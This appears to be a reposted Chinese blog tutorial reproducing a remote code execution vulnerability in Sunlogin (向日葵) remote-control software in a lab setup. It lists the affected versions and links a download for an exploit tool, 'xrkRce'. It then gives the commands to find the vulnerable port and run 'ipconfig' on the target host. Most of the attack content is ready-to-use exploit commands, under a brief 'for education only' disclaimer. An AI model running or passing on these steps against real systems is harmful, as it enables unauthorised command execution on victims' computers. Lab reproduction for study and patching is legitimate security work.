向日葵远程代码执行漏洞复现过程

前言

本文内容仅为技术科普,请勿用于非法用途!

一、准备测试环境

1.windows虚拟机(内网IP地址172.16.20.68)
2.kali linux (内网IP地址172.16.20.76)

二、向日葵软件

存在漏洞向日葵版本:11.1.1、10.3.0.27372、11.0.0.33162
向日葵远程代码执行漏洞复现过程_第1张图片

三、工具及源码下载地址

链接:https://pan.baidu.com/s/19qBlCxvWxhOj3qJd_MVfyw
提取码:xhil

四、扫描漏洞

1.这里用的kali,所以下载linux版本,并进行解压;
注意:这里需要给解压后的文件xrkRce所有权限(777),不然会提示权限不够;
在这里插入图片描述在这里插入图片描述
2.进行漏洞扫描,确认存在漏洞的端口;

./xrkRce -h 172.16.20.68

向日葵远程代码执行漏洞复现过程_第2张图片

这里发下端口为65326;
3.现在对漏洞进行利用,进行远程命令,查看对方IP;

./xrkRce -h 172.16.20.68 -c "ipconfig" -p 65326 -t rce

向日葵远程代码执行漏洞复现过程_第3张图片
注意:这里可能会提示命令【命令执行完毕,但是没有回显】,需要去开启回显【防火墙-高级设置-出站规则-回显】
向日葵远程代码执行漏洞复现过程_第4张图片
在这里插入图片描述

更多安全分享,请关注【安全info】微信公众号!

你可能感兴趣的:(Kali渗透,渗透测试,web安全,安全)